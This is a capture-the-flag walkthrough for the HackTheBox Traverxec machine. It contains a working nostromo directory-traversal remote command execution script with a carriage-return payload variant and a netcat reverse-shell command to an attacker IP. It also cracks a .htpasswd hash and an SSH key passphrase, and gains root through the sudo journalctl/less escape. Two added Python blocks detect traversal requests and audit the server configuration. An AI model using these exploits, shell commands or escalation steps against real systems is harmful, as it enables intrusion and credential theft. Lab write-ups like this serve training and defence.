Traverxec


HackTheBox Traverxec Machine Info Card

Traverxec is an easy difficulty machine running Linux. It tests your knowledge of basic enumeration and privilege escalation using a common exploit and a GTFOBin.

Be sure to check out the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan traverxec.htb -oX nmap.xml
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-04 17:15 PST
Nmap scan report for traverxec.htb (10.10.10.165)
Host is up (0.22s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.45 seconds

We see port 80 open and straight away we notice nostromo 1.9.6.

Foothold

Using searchsploit we find some vulns:

searchsploit nostromo
--------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                       |  Path
                                                                                                                                                                     | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                                                                                                 | exploits/multiple/remote/47573.rb
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                                                                                                 | exploits/linux/remote/35466.sh
--------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

We will take a look at the 35466.sh script to see what it does. Searchsploit scripts are notorious for carrying different Unicode formats and whitespace from other operating systems, which can cause a script to fail or run incorrectly. Not only that, but they often have comments that don’t use the comment syntax of the language they are written in. So open the file in your preferred editor and just take what you need.

We end up with the following:

nano nhttpd.sh
#!/bin/sh
######################################
#                                    #
#  RedTeam Pentesting GmbH           #
#  kontakt@redteam-pentesting.de     #
#  http://www.redteam-pentesting.de  #
#                                    #
######################################

if [ $# -lt 3 ]; then
    echo "Usage: $(basename $0) HOST PORT COMMAND..."
    exit 2
fi


HOST="$1"
PORT="$2"
shift 2

( \
    echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \
    echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
    echo "$@ 2>&1" \
) | nc "$HOST" "$PORT" \
  | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'

Upon running this script as is, it runs without errors but nothing happens. On closer inspection we see the URL-encoded ..%2f..%2f..%2f, which decodes to ../../../, our directory traversal.

Changing this to use a carriage return instead, such as .%0d./.%0d./.%0d./.%0d., and changing #!/bin/sh to #!/bin/bash fixes the issue:

./nhttpd.sh traverxec.htb 80 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
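From the defender's side, the interesting part of the two payload forms above is that they only look alike after decoding: ..%2f is plain percent-encoding, while .%0d./ hides the dot-dot behind a carriage return. A request filter or log detector that looks for ".." before it has decoded and stripped control characters will see only the first form. The script below is an added example written for this write-up, not code from the page or from the nostromo project; it normalises request targets the way a detector should and flags any path that climbs above the document root. The sample request lines are constructed, and the explanation of why the CR-split form slipped past the server is my reading of the behaviour the write-up observed, not something the page states.

```python
from urllib.parse import unquote

# Constructed sample request lines for the detector (not captured from any
# real server). The two encoded traversal forms mirror the ones discussed
# in the write-up; the rest are benign requests, one of them containing a
# ".." that still resolves inside the docroot.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /~david/protected-file-area/ HTTP/1.0",
    "GET /icons/../index.html HTTP/1.0",
    "POST /..%2f..%2f..%2fbin/sh HTTP/1.0",
    "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0",
]


def normalize_path(raw_path):
    """Percent-decode (repeatedly, to catch double encoding) and then strip
    CR/LF so that '.%0d./' and '..%2f' both collapse to '../'.

    Assumption: a server that checks for '..' before stripping carriage
    returns misses the CR-split form, which is why the write-up's second
    payload worked where the first did not."""
    path = raw_path
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\r", "").replace("\n", "")


def escapes_docroot(path):
    """Walk the path segments and report whether '..' ever climbs above the
    document root (directory depth drops below zero)."""
    depth = 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def scan_requests(lines):
    """Return (original line, normalised path) for every request line whose
    target escapes the docroot after normalisation."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        target = parts[1].split("?", 1)[0]  # drop any query string
        normalised = normalize_path(target)
        if escapes_docroot(normalised):
            findings.append((line, normalised))
    return findings


if __name__ == "__main__":
    for line, path in scan_requests(SAMPLE_REQUESTS):
        print(f"TRAVERSAL  {path!r:<26} <- {line}")
```

Running it flags only the two encoded payloads; the /icons/../index.html request is left alone because its dot-dot never leaves the docroot, which is the distinction a noisy ".." grep does not make.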

Now let’s connect with netcat.

First set up our netcat listener:

nc -lvp 1234

Then we use our local script to issue our netcat command remotely on traverxec:

./nhttpd.sh traverxec.htb 80 nohup nc <attacker-ip> 1234 -e /bin/bash &

From here we can upgrade the shell!

OK, so we are in as user www-data and our working directory is /usr/bin.

First things first, let’s see what other users are on this machine. Taking a look in /home we see a user called david, but we do not have permission to access their home directory.

Htpasswd

Next we will do a search for hidden files to see if we uncover anything:

www-data@traverxec:/usr/bin$ find / -name ".*" -ls 2>&1 | grep -v "Permission denied"
.... SNIP ....		.... SNIP ....		.... SNIP ....
11005      4 -rw-r--r--   1 root     bin            41 Oct 25 15:20 /var/nostromo/conf/.htpasswd

Having a look inside this file we find a hash:

www-data@traverxec:/usr/bin$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Let’s take this over to our attacker machine and see if we can crack it:

john htpasswd.txt --wordlist=/root/wordlists/passwords.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Now....4me       (?)
1g 0:00:14:48 DONE (2019-12-05 00:05) 0.001125g/s 312184p/s 312184c/s 312184C/s NuGiEr37..Novara
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Ok so we have a password. Now let’s go see where we can use it.

It doesn’t work with ssh or su david, so we need to know more about how nostromo works and where the .htpasswd is being used.

Doing some research about nostromo, it seems that the folder that stores the configuration files is /var/nostromo/conf, where we found our .htpasswd. Let’s take a look in this directory and see if there is anything interesting:

www-data@traverxec:/usr/bin$ ls -l /var/nostromo/conf
total 8
-rw-r--r-- 1 root bin 2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin  498 Oct 25 15:20 nhttpd.conf

We need to know more about how nostromo’s configuration works, so we will open up the manpage with man nhttpd to have a reference for the configuration file.

Now let’s have a look at how things are set up:

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf 
# MAIN [MANDATORY]

servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html

# LOGS [OPTIONAL]

logpid			logs/nhttpd.pid

# SETUID [RECOMMENDED]

user			www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons			/var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www

Looking at the config, a couple of things stand out. Basic Authentication is set up, and the password hash is located at /var/nostromo/conf/.htpasswd, which we have already cracked.

The other thing that stands out is that there is a section called HOMEDIRS. I am assuming this is similar to Apache.

On reviewing the manual we see that homedirs exposes a path on the webserver to any user home directories found in /home. To access a user’s home directory from the webserver we append ~ and the username to the URL, such as http://traverxec.htb/~david.

Going to this page we are presented with a message:

Traverxec David Screenshot

Looking further into the HOMEDIRS config within the manual, we also see that access can be restricted to a subfolder rather than the user’s whole home directory. Here it has been set to public_www.
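To make the docroot, alias and homedirs rules concrete, and to turn the config review above into something repeatable, here is an added example (my own code, not part of the write-up or of nostromo) that parses the nhttpd.conf layout shown earlier, maps a request path to the file the server would hand out, and flags the settings that mattered on this box. The config text is a constructed copy of what the page shows, the file-mode table stands in for a stat() call and mirrors the -rw-r--r-- that the earlier find output reported for .htpasswd, and the mapping of /~user/ onto homedirs/homedirs_public follows the manual's behaviour as the write-up describes it.

```python
import posixpath
import stat

# Constructed copy of the nhttpd.conf layout shown in the write-up
# (same keys and values as on the page, comments trimmed).
SAMPLE_CONF = """\
# MAIN [MANDATORY]
servername      traverxec.htb
serverlisten    *
serveradmin     david@traverxec.htb
serverroot      /var/nostromo
servermimes     conf/mimes
docroot         /var/nostromo/htdocs
docindex        index.html

# SETUID [RECOMMENDED]
user            www-data

# BASIC AUTHENTICATION [OPTIONAL]
htaccess        .htaccess
htpasswd        /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]
/icons          /var/nostromo/icons

# HOMEDIRS [OPTIONAL]
homedirs        /home
homedirs_public public_www
"""

# Constructed file modes standing in for a stat() of the paths in question;
# 0o644 mirrors the -rw-r--r-- shown for .htpasswd in the write-up.
SAMPLE_MODES = {"/var/nostromo/conf/.htpasswd": 0o644}


def parse_nhttpd_conf(text):
    """Split each non-comment line into key and value on whitespace.
    Keys beginning with '/' are URL aliases; everything else is a setting."""
    settings, aliases = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts
        (aliases if key.startswith("/") else settings)[key] = value
    return settings, aliases


def resolve_url(settings, aliases, url_path):
    """Map a request path to the file nhttpd would serve, following the
    docroot / alias / homedirs rules the write-up describes:
    /~user/x lands in <homedirs>/user/<homedirs_public>/x."""
    if url_path.startswith("/~") and "homedirs" in settings:
        user, _, rest = url_path[2:].partition("/")
        base = posixpath.join(settings["homedirs"], user,
                              settings.get("homedirs_public", ""))
        return posixpath.normpath(posixpath.join(base, rest))
    for prefix, target in aliases.items():
        if url_path == prefix or url_path.startswith(prefix + "/"):
            return posixpath.normpath(target + url_path[len(prefix):])
    return posixpath.normpath(settings["docroot"] + url_path)


def audit(settings, modes):
    """Flag the configuration choices that turned into a foothold here."""
    findings = []
    if "homedirs" in settings and "homedirs_public" not in settings:
        findings.append("homedirs set without homedirs_public: entire home "
                        "directories are reachable via /~user/")
    if settings.get("user", "root") == "root":
        findings.append("no 'user' set under SETUID: nhttpd would not drop "
                        "privileges after starting as root")
    htpasswd = settings.get("htpasswd")
    if htpasswd and modes.get(htpasswd, 0) & stat.S_IROTH:
        findings.append(f"{htpasswd} is world-readable: the service account, "
                        "and anyone who compromises it, can read the hashes")
    return findings


if __name__ == "__main__":
    settings, aliases = parse_nhttpd_conf(SAMPLE_CONF)
    print(resolve_url(settings, aliases, "/~david/protected-file-area"))
    for finding in audit(settings, SAMPLE_MODES):
        print("WARN:", finding)
```

With the page's config, resolve_url() turns /~david/protected-file-area into /home/david/public_www/protected-file-area, which is exactly the directory listed next in the write-up, and the only audit finding is the world-readable .htpasswd: the homedirs exposure was already limited to public_www and the server drops to www-data, so the hash file's permissions were the one setting that handed the foothold its password.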

Let’s see if we can take a peek in this directory:

www-data@traverxec:/var/nostromo/conf$ ls -l /home/david/public_www
total 8
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area

And there is our protected folder, it seems. Let’s see if the password works with the username david at http://traverxec.htb/~david/protected-file-area:

Traverxec Protected File Area Screenshot

Yep, we get access and a directory index containing the file backup-ssh-identity-files.tgz. That will be our ssh access, w00t!

SSH Identity

We download the file, extract it and take a look in /home/david/.ssh. Remember, dot files and folders are hidden, so when you look in the extracted folders it will look like there is nothing there. Use ls -la to show them.

Let’s try using our newfound ssh key:

ssh -i .ssh/id_rsa david@traverxec.htb
Enter passphrase for key '.ssh/id_rsa': 

We get asked for a passphrase, and the password we found is a no go. Looks like we have some more cracking to do!

User

Fire up ssh2john and convert the key into a format John The Ripper can read:

python ssh2john.py id_rsa > id_rsa.hash

Now let’s crack the hash with John The Ripper:

john --wordlist=/root/wordlists/passwords.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hu....er           (/root/Documents/traverxec/backup-ssh-identity-files/home/david/.ssh/id_rsa)
74g 0:00:01:13 DONE (2019-12-05 04:12) 1.009g/s 4131Kp/s 4131Kc/s 4131KC/s 233091..hielox
Session completed

Now that we have gotten our ssh key passphrase let’s try logging in again:

ssh -i id_rsa david@traverxec.htb
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ cat user.txt
7db0b48469....50d9782f3d

And there we are. We have our user flag!

Now let’s move on to root.

Root

When we take a look in david’s home directory we see a script in the bin folder called server-stats.sh:

david@traverxec:~/bin$ cat server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

The last line is using sudo. This will most likely be our exploit.

The journalctl command is a GTFOBin because it pages its output through less, which can be used to spawn a shell.

Let’s run the command on the last line. The pipe (|) into cat is pointless, so let’s get rid of that:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2019-12-06 08:08:23 EST, end at Fri 2019-12-06 11:48:54 EST. --
Dec 06 08:08:28 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory
Dec 06 08:08:28 traverxec nhttpd[457]: started
Dec 06 08:08:28 traverxec nhttpd[457]: max. file descriptors = 1040 (cur) / 1040 (max)
Dec 06 08:08:28 traverxec systemd[1]: Started nostromo nhttpd server.
Dec 06 10:28:47 traverxec sudo[1026]: www-data : command not allowed ; TTY=pts/1 ; PWD=/usr/bin ; USER=root ; COMMAND=validate

OK, so here we see a problem. We like to see what we are doing, so we always have our terminal windows maximized. Because of this all of the output fits on one screen, so less exits immediately instead of waiting for input.

Making the terminal window smaller and running the command again so less can do its thing does the trick.

When less shows lines 1-6/6 (END), type !/bin/bash to grab the root shell:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2019-12-06 08:08:23 EST, end at Fri 2019-12-06 11:53:42 EST. --
Dec 06 08:08:28 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after
Dec 06 08:08:28 traverxec nhttpd[457]: started
Dec 06 08:08:28 traverxec nhttpd[457]: max. file descriptors = 1040 (cur) / 1040 (max)
Dec 06 08:08:28 traverxec systemd[1]: Started nostromo nhttpd server.
Dec 06 10:28:47 traverxec sudo[1026]: www-data : command not allowed ; TTY=pts/1 ; PWD=/usr/bin ; USER=root ; COMMAND=
lines 1-6/6 (END)
!/bin/bash
root@traverxec:/home/david/bin# cat /root/root.txt
9aa36a6d76....78f6e0d906

Now wasn’t that fun? Enjoy :)

Conclusion

This machine was a good learning curve in making sure you research the services you are trying to exploit. Using what we had at hand on the machine, we were able to work out the paths we needed to take for both user and root. We should never underestimate the importance of active research.
